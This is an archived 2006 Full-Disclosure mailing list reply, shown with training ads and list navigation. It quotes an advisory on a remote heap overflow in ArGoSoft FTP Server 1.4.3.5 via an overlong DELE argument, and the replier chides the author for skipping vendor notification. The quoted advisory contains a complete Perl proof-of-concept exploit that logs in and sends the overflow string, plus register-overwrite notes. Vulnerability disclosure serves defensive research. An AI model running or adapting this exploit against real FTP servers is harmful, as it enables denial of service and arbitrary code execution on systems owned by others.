Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] ArGoSoft FTP server remote heap overflow

from [ad@heapoverflow.com] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] ArGoSoft FTP server remote heap overflow
Date: Sat, 25 Feb 2006 21:31:53 +0100 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
you forgot to message the programmer of it before the public

/slap on you

;->

Jerome Athias wrote:

-- Title: ArGoSoft FTP server remote heap overflow

-- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and
prior

-- Affected Vendor: ArGoSoft - http://www.argosoft.com

-- Impact: DoS, Arbitrary Code Execution

-- Where:

From remote


-- Type: Heap Overflow

-- Vulnerability Details: A remote attacker with valid credentials
is able to trigger a heap overwrite in ArgoSoft FTP server. The bug
occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code
or launch a denial of service attack.

-- Credit: This vulnerability was discovered by Jerome Athias.
https://www.securinfos.info/english/




#!/usr/bin/perl

# ---------------------------------------------------- # #
ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server # # Jerome
Athias                           # #
---------------------------------------------------- #

use Net::FTP;

# geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug =
@ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4];

# ===========

if (($host) && ($port)) {

# make exploit string $exploit_string = "DELE "; $exploit_string .=
"A" x 2041; $exploit_string .= "B" x 4; $exploit_string .= "C" x
1026;

#    On Win2K SP4 FR: #    EAX 42424241 #    ECX 43434343 #    EDX
43434342 #    EBX 43434B73

# ===================

print "Trying to connect to $host:$port\n"; $sock =
Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug)
or die "[-] Connection failed\n"; print "[+] Connect OK!\n"; print
"Logging...\n"; if (!$user) { $user = "test"; $pass = "test"; }
$sock->login($user, $pass); $answer = $sock->message; print
"Sending string...\n"; $sock->quot($exploit_string); } else { print
"ArgoSoft FTP Server - PoC
Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port
username password [debug: 1 or 0]\n\n"; }
_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBRAC+uK+LRXunxpxfAQK6Gw//U+rWA2lZwtNSF5ZUyXgPP7RaWwiFfdNP
pLG3LjxGhj5nVvjbf5MDS3pbTHc09sCMXB/rapH1UJhYwvRva7Bc7Wp83TJrmMgg
8qOrKl269v/3Mv8VBZ3j4arxYVPp+JxEAK6HCNndOvgCKbhiZUVodJh45OWsa4zW
b1N85Shxfw7Zv+Jb0vf4eY05lnzu7OgHxPOGsykaWTvtNtlZZMuxorGBUeL1lJmz
s924HwIyKQnpZAmzSbXcBACPVBpqHR4WLRU6dyJkekt4lU0F80lsr5+qDsv9IVsA
S8phar6sbo+VtaxSTh8Q9tK4NhI3WaYuKh9SRZ6ahniXN/69fqSnJSbDFdSBEQib
12NhjoiHPTSyAv1l2SdccRiRjtik6StMQjkbe9pgf3WGGerzXZuk4ckUFVblSpXR
OW9Zrn1W11pPzcwI+laVUTFEmyTdWMh+yU1yQIPliu2G1IbsuBmXYsMj/5vLIDhj
rCY/PopBtrI3/np+XN1Pq8mHwUwUeWw01K2kir7QUMNmn32LIA7UUjaACoEukINy
eC8hVXoAOOc/ZUmr9Mfs391tdEdnO4ufOamTDwJ7KG/Ngxn54ic+vmIkyl3aUO3Q
ZXeSKe1igZ9dEDJWSYhfyj8bgEXQcA4LhLgwCHXC150Ehp4d/1YQo3qIFBDrMt3m
KIjI6zWxH10=
=bA3R
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] WinAmp Vulns, Andrew Smith
Next by Date:  [Full-disclosure] PowerTerm, nodialtone
Previous by Thread:  [Full-disclosure] ArGoSoft FTP server remote heap overflow, Jerome Athias
Next by Thread:  [Full-disclosure] Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability, nukedx
Indexes:  [Date] [Thread] [Top] [All Lists]